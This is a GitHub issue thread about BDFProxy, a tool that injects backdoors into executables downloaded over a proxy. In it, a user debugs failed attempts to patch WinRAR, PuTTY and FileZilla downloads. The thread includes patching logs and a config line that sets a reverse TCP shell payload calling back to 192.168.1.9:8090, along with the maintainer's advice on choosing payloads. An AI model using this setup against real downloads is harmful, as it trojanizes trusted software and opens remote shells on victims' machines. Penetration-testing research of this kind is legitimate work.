### ISSUE TITLE
patching failed

### ISSUE THREAD

**Issue by FreelancePentester** [secretsquirrel/BDFProxy#39]
[*] HOST: www.rarlab.com
[*] PATH: /rar/wrar54b2.exe
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
LCD_CFG_dispatch_fptr 0x0
[*] Reading win32 entry instructions
[*] Gathering file info
LCD_CFG_dispatch_fptr 0x0
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Adding New Section for updated Import Table
[!] Adding LoadLibraryA Thunk in new IAT
[!] Adding VirtualAlloc Thunk in new IAT
[!] File has extra data after last section, cannot add new section
[x] Patching failed

But if i use backdoor-factory for patching this file, then it patch suscessful. :(

**Comment by secretsquirrel** [comment]
What payload did you use?

This is the cause: [!] File has extra data after last section, cannot add new section

I would try a different payload.

**Comment by secretsquirrel** [comment]
Hop in #BDFactory on freenode if you have questions on usage.

**Comment by FreelancePentester** [comment]
I try to patch some package as putty.exe, filezilla.exe..but they didn't work.

**Comment by FreelancePentester** [comment]
I don't know why bdfproxy with bdf can not patch any package, but bdf can patch many patch. :)

**Comment by secretsquirrel** [comment]
Ok. I'll need more details to help you. I'll need your config file and proxy.log out put. Please use pastebin for this. Also where is it failing? Also this is easier to handle in IRC.

**Comment by FreelancePentester** [comment]
proxy.log: http://pastebin.com/NDgM3ecm
bdfproxy.cfg: http://pastebin.com/7fef1Weg

Thanks!

**Comment by secretsquirrel** [comment]
Try                 "SHELL": "iat_reverse_tcp_inline" for x86 and x64 Windows

**Comment by FreelancePentester** [comment]
the same error..
[*] HOST: www.rarlab.com
[*] PATH: /rar/wrar54b2.exe
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
LCD_CFG_dispatch_fptr 0x0
[*] Reading win32 entry instructions
[*] Gathering file info
LCD_CFG_dispatch_fptr 0x0
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Adding New Section for updated Import Table
[!] Adding LoadLibraryA Thunk in new IAT
[!] File has extra data after last section, cannot add new section
[x] Patching failed

[[[WindowsIntelx86]]]
		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
		# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
		PATCH_METHOD = automatic
		HOST = 192.168.1.9
		PORT = 8090
		# SHELL for use with automatic PATCH_METHOD
		SHELL = iat_reverse_tcp_inline

**Comment by secretsquirrel** [comment]
You can't use any payload with 'IAT' in the name because the binary in question does not have loadlibrarya in the IAT and BDF cannot add a new import directory because of extra data on the end of the binary.

**Comment by FreelancePentester** [comment]
Thanks for your supporting. My matter has been resolved. :dancer:
